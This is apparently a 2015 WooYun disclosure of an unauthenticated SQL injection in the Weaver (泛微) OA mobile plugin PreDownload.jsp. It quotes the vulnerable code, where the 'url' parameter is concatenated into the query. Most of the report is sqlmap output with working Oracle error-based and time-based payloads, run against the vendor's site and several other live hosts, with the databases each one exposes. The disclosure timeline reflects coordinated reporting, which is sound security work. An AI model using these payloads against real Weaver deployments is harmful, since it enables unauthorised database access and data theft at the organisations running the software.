当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138725

漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)

相关厂商:泛微OA

漏洞作者: 浮萍

提交时间:2015-09-08 15:19

修复时间:2015-12-09 19:20

公开时间:2015-12-09 19:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-13: 细节向第三方安全合作伙伴开放
2015-11-04: 细节向核心白帽子及相关领域专家公开
2015-11-14: 细节向普通白帽子公开
2015-11-24: 细节向实习白帽子公开
2015-12-09: 细节向公众公开

简要描述:

SQL注入
无需登录

详细说明:

问题出在mobile\plugin中的PreDownload.jsp文件
其中

String url = StringHelper.null2String(request.getParameter("url"));
String sessionkey = StringHelper.null2String(request.getParameter("sessionkey"));
MpluginServiceImpl pluginService = (MpluginServiceImpl)BaseContext.getBean("mpluginServiceImpl");
if(pluginService.verify(sessionkey)) {
	String filepath = "";
	String iszip = "";
	String filename = "";
	
	String hashcode = "";
	
	if (!StringHelper.isEmpty(url)) {
			DataService ds = new DataService();
			String sql = "select objname,filetype,filedir,iszip from attach where id = '"
					+ url+"'";
			Map dataMap = ds.getValuesForMap(sql);
			if (!dataMap.isEmpty()) {
				filepath = StringHelper.null2String(dataMap.get("filedir"));
				iszip = StringHelper.null2String(dataMap.get("iszip"));
				filename = StringHelper.null2String(dataMap.get("objname"));
			} else {
			filepath = request.getRealPath(url);
			}
		} else {
		filepath = request.getRealPath(url);
		iszip = "0";
		filename = filepath.substring(filepath.lastIndexOf("/")+1);
	}


这里对url并没有过滤
可能导致sql注入
这里我们首先以官方为例
http://**.**.**.**:9085/mobile/plugin/PreDownload.jsp?url=1

选区_298.png


选区_299.png


直接sqlmap

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: url=1' AND 5516=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (5516=5516) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'DXjL'='DXjL
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: url=1' AND 7465=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(71)||CHR(103)||CHR(119),5) AND 'iLzy'='iLzy
---


数据库

available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3


与http://**.**.**.**/bugs/wooyun-2015-0124589中的一致

漏洞证明:

再举几个案例
http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: url=1' AND 9725=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (9725=9725) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'byuN'='byuN
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: url=1' AND 8995=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(68)||CHR(105)||CHR(97),5) AND 'TiYk'='TiYk
---
[22:57:56] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


数据库

available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB


http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: url=1' AND 3519=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (3519=3519) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qKYb'='qKYb
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: url=1' AND 8926=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(99)||CHR(78)||CHR(71),5) AND 'ejvi'='ejvi
---


数据库

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


http://10.0.0.*/mobile/plugin/PreDownload.jsp?url=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: url=1' AND 2035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2035=2035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)) AND 'NyZn'='NyZn
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: url=1' OR 9575=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(80)||CHR(117)||CHR(108),5) AND 'rioo'='rioo
---


数据库

available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: url=1' AND 9799=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9799=9799) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'VxQf'='VxQf
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: url=1' AND 8957=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(66)||CHR(69)||CHR(74),5) AND 'lkVv'='lkVv
---
[23:18:02] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


数据库

available databases [28]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EWEAVERTEST
[*] EWEAVERTEST1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] MOBILE40
[*] MOBILE41
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1%27

选区_301.png


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-10 19:18

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-06 15:34 | 有归于无 ( 实习白帽子 | Rank:98 漏洞数:20 | 有归于无)

    a8-v5?

  2. 2015-09-11 02:11 | 坏男孩-A_A ( 路人 | Rank:10 漏洞数:4 | 菜鸟一枚)

    坐等是哪个版本的!!!!